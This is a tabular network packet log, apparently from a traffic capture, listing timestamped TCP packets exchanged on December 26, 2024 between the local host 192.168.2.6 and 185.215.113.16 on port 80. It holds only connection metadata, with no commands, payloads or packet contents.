Dec 26, 2024 12:41:43.692585945 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.693331957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.693413973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.694144011 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.694197893 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.694243908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.694966078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.695018053 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.695121050 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.695980072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.695992947 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.696026087 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.696038961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.696780920 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.696893930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.697016954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.697710991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.697851896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.697931051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.698800087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.755156994 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.775368929 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.775391102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.775841951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.775938988 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.775990963 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.776698112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.776762962 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.776788950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.777014971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.777686119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.777705908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.777760029 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.778418064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.778527975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.778582096 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.779297113 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.779390097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.779448032 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.780211926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.780427933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.780492067 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.781107903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.781205893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.781995058 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.782047987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.782149076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.782890081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.782943964 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.782958984 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.783765078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.783817053 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.783879995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.784709930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.784768105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.784768105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.785010099 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.785629988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.785754919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.785804987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.786473036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.786535025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.786585093 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.787327051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.787576914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788197994 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788322926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788404942 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.788860083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788872004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788882971 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.788924932 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.789791107 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.789803028 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.789814949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.789869070 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.790656090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.790668964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.790679932 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.790715933 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.791577101 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.791589022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.791601896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.791635990 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.791662931 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.792438984 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.792450905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.792463064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.792490005 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.793333054 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.793345928 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.793356895 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.793406010 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.794146061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.794296026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.794353008 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.794857979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.794869900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.794882059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.794931889 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.795620918 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.795634031 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.795644999 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.795682907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.795697927 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.796468019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.796576023 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.796593904 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.797034979 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.797375917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.797398090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.797410011 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.797446012 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.797461987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.798260927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.798276901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.798290968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.798327923 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.799001932 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.799119949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.799130917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.799174070 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.799839020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.799885988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.799897909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.800693035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.800719976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.800730944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.800745010 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.800784111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.801534891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.801568985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.801579952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.801639080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.802506924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.802520037 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.802537918 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.802575111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.802628040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.803196907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.803226948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.803239107 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804028034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804042101 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804060936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804088116 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.804114103 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.804898977 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804946899 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.804959059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.805016994 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.805816889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.805902004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.805913925 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.805962086 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.806556940 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.806621075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.806634903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.807292938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.807307959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.807342052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.807423115 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.808105946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.808119059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.808131933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.808197975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.808866024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.809060097 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.809250116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.809261084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.809273005 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.809312105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.864520073 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.981815100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.981841087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.981852055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.981894970 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.982079029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.982126951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.982187033 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.982547045 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.982568979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.982582092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.982618093 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.982652903 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.983290911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.983339071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.983350992 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.983398914 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.984061956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984112978 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.984185934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984198093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984236956 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.984821081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984889984 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984901905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.984961987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.985691071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.985702991 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.985713959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.985743046 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.985759020 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.986443996 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.986455917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.986469030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.986502886 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.987149000 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987160921 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987179041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987200022 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.987227917 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.987833977 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987894058 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987905025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.987960100 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.988590956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.988661051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.988682985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.988696098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.988730907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.989367008 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.989394903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.989406109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.989458084 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.990189075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.990207911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.990221977 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.990259886 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.990304947 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.990911007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.990968943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.990982056 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.991038084 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.991631985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.991687059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.991689920 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.991700888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.991740942 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.992394924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.992436886 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.992448092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.992489100 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.993325949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.993397951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.993447065 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.993474960 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.993518114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.994023085 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994083881 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994189978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994229078 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.994829893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994841099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994853020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.994879961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.994894981 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.995439053 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.995551109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.995567083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.995621920 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.996244907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.996278048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.996314049 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.996404886 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.996448040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.997020006 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997106075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997118950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997159958 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.997795105 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997840881 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997853994 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.997869968 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.997896910 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.998650074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.998667955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.998678923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.998722076 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.999211073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.999263048 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.999511957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.999576092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.999588013 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.999629021 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.000310898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.000358105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.000510931 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.000523090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.000562906 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.001050949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001122952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001135111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001188993 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.001862049 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001873970 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001892090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.001943111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.002527952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.002609968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.002621889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.002661943 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.003451109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.003463030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.003474951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.003498077 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.003513098 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.004040956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004132032 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004143000 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004188061 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.004842997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004862070 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004877090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.004909039 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.004924059 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.005712032 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.005738020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.005748034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.005805016 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.006357908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.006370068 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.006381035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.006397963 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.006417036 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.007255077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.007266045 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.007277966 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.007304907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.007992983 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.008043051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.008126020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.052020073 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.192476988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.192501068 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.192521095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.192580938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.192610025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:44.192662001 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:44.192734957 CET	80	49784	185.215.113.16	192.168.2.6
